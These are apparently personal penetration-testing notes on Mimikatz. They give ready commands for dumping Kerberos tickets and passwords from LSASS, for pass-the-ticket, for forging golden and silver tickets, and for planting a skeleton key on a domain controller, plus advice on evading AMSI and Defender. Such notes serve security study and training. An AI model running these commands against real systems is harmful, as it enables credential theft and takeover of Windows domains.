- author:: Nathan Acks
- date:: 2022-08-31
Mimikatz needs to be run with administrative privileges (on the local machine), and provides its own command prompt. Use the `privilege::debug` command to check if you’re running with the right privileges.
Mimikatz can dump ticket granting tickets (and session keys) from the memory of Windows’ Local Security Authority Subsystem Service (LSASS); these can then be used for privilege elevation or lateral movement (depending on which users are active on that machine).
Use the `sekurlsa::tickets /export` command to dump any Kerberos “tickets” (really ticket + session key data structures) from LSASS’s memory as .kirbi files. Tickets are named like ID-USER-SERVICE-DOMAIN.kirbi; ticket granting tickets have a `krbtgt` SERVICE name. If you can find a `krbtgt` ticket belonging to an administrator account, then you’ve (almost) struck gold.
Pass the Ticket Attacks
Use the `kerberos::ptt TICKET_FILE` command to load the data structure in the specified .kirbi file into memory (allowing the account you’re logged in as to “pass the ticket” and impersonate the user whose ticket you’ve harvested).
Golden/Silver Ticket Attacks
To generate a golden or silver ticket using Mimikatz, begin by running the `lsadump::lsa /inject /name:SERVICE` command to retrieve the service SID and NTLM password hash for that service. If SERVICE is `krbtgt` then this will allow the creation of a golden ticket; otherwise you’ll be creating a silver ticket.
(You can also use a user name instead of SERVICE, in which case it appears that Mimikatz will just request a ticket granting ticket from the KDC as that user in the next step; this is theoretically just as noisy as a golden ticket, but looks more “normal”.)
To actually create and cache the ticket, use `kerberos::golden /user:USER /domain:DOMAIN /sid:SID /krbtgt:HASH /id:TYPE`, where:
- USER is the user to create the ticket for (probably the one you’ve compromised).
- DOMAIN is the domain to create the ticket for.
- SID is the SID of the service from the previous step.
- HASH is the NT hash of the service password from the previous step.
- TYPE is the type of Kerberos ticket to create; use 500 for a golden (ticket granting) ticket, and 1103 for a service ticket.
Once the ticket has been created, use `misc::cmd` to open a command prompt using the newly forged ticket.
KDC Skeleton Key
If Mimikatz is run on a domain controller, it can modify the authentication service’s memory using the `misc::skeleton` command to cause it to attempt to decrypt the AS-REQ using both the user’s NT hash and an NT hash of your choosing (by default `60BA4FCADC466C7A033C178194C03DF6`, which is just the NT hash of `mimikatz`). This means that you can send an AS-REQ as any user using the “skeleton key” hash to gain access as that user, similar to a golden ticket attack.
Obviously this isn’t very persistent itself, as the skeleton key will be lost if the server is rebooted or the authentication service restarted.
Pure PowerShell Implementation
Mimikatz binaries are generally detected by AV on download these days, but fortunately there’s a PowerShell reimplementation available from the Empire Project that can be run after bypassing AMSI.
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"' > C:\mkat.txt
Note that Microsoft Defender will still detect the execution of Invoke-Mimikatz and kill the hosting PowerShell process. This is why we need to redirect the output to a file.